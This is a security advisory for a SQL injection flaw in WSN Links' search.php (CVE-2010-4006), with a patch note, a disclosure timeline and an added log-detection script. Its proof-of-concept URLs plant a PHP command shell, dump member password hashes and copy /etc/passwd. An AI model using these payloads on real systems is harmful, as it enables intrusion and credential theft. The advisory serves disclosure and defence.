WSN Links - SQL Injection

24 Nov 2010 | Reported by Mark Stanislav | Type: exploitdb | Source: www.exploit-db.com

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006). SQL injection in search.php allows 'UNION SELECT' exploits

'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
Mark Stanislav


I. DESCRIPTION
---------------------------------------
A vulnerability in the search.php code allows SQL injection through various parameters. By splitting portions of SQL code across the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections were possible.

 
II. AFFECTED VERSIONS
---------------------------------------
< 6.0.1; < 5.1.51 ; < 5.0.81


III. TESTED VERSIONS
---------------------------------------
5.1.40 & 5.1.49


IV. PoC EXPLOITS 
---------------------------------------
1) A 'UNION SELECT' which results in a PHP shell-execution script
http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20"<?php%20system($_REQUEST[cmd]);%20?>"%20INTO%20OUTFILE&namesearch=/var/www/exec.php&action=filter&filled=1&whichtype=categories

2) A 'UNION SELECT' which extracts a member's name, password hash, and e-mail to a file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILE&namesearch=/var/www/pass.txt&action=filter&filled=1&whichtype=categories

3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file
http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILE&namesearch=/var/www/passwd.txt&action=filter&filled=1&whichtype=categories


V. NOTES 
---------------------------------------
* The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work. 
* Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection.
* There is potential to exploit this vulnerability in a way that outputs user data directly to the browser.
* Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments.
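
Added example (not part of the original advisory): a log check for the request patterns described above, flagging search.php requests whose 'namecondition' or 'namesearch' values carry the SQL fragments seen in the PoCs, a file path in 'namesearch', or 'debug=1'. The log layout, the sample lines and the benign 'LIKE' value are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The two parameters the advisory names as the injection points.
INJECTED_PARAMS = ("namecondition", "namesearch")
# Fragments from the PoC requests: "))" breakout, UNION SELECT, INTO OUTFILE, load_file().
SQL_MARKERS = re.compile(r"\)\)|union[\s(]+select|into\s+outfile|load_file\s*\(", re.I)
# Assumed log layout (common/combined): client ... "METHOD target HTTP/x" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def inspect_line(line):
    """Return (client, status, rule, value) findings for one log line."""
    m = REQUEST_RE.match(line)
    if not m:
        return []
    client, target, status = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/search.php"):
        return []
    # parse_qs percent-decodes, so %20UNION%20 is matched as " UNION ".
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for name in INJECTED_PARAMS:
        for value in params.get(name, []):
            if SQL_MARKERS.search(value):
                findings.append((client, status, "sql-in-" + name, value))
    # In the PoCs, namesearch holds the OUTFILE destination path.
    for value in params.get("namesearch", []):
        if value.startswith("/"):
            findings.append((client, status, "path-in-namesearch", value))
    if "1" in params.get("debug", []):
        findings.append((client, status, "debug-mode-requested", "debug=1"))
    return findings

def scan(lines):
    return [f for line in lines for f in inspect_line(line)]

# Constructed sample log lines (documentation IP ranges; 'LIKE' is an assumed benign value).
_PFX = ' - - [01/Nov/2010:10:00:00 +0000] "GET '
SAMPLE_LOG = [
    "203.0.113.5" + _PFX + '/search.php?namecondition=LIKE&namesearch=linux HTTP/1.1" 200 5120',
    "198.51.100.7" + _PFX + '/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%201%20INTO%20OUTFILE&namesearch=/var/www/out.txt&action=filter&filled=1 HTTP/1.1" 200 312',
    "198.51.100.7" + _PFX + '/search.php?namesearch=test&action=filter&debug=1 HTTP/1.1" 200 9000',
    "203.0.113.9" + _PFX + '/index.php?q=1%20UNION%20SELECT%202 HTTP/1.1" 200 100',
]
if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

This only sees parameters sent in the query string; values submitted in a POST body do not appear in a standard access log and need application-level or WAF logging.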


VI. SOLUTION
---------------------------------------
Upgrade to the most recent version of your 'WSN Links' code branch.


VII. REFERENCES
---------------------------------------
http://www.wsnlinks.com/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006
http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/

VIII. TIMELINE
---------------------------------------
10/10/2010: Initial disclosure e-mail to the vendor
10/18/2010: Follow-up via the vendor's contact web form
10/18/2010: Vendor acknowledgement/commitment to fix
10/21/2010: Patched versions released
10/31/2010: Public disclosure

Published: 24 Nov 2010 00:00
Vulners AI Score: 6.5 (Medium risk)
CVSS 2: 7.5
EPSS: 0.01376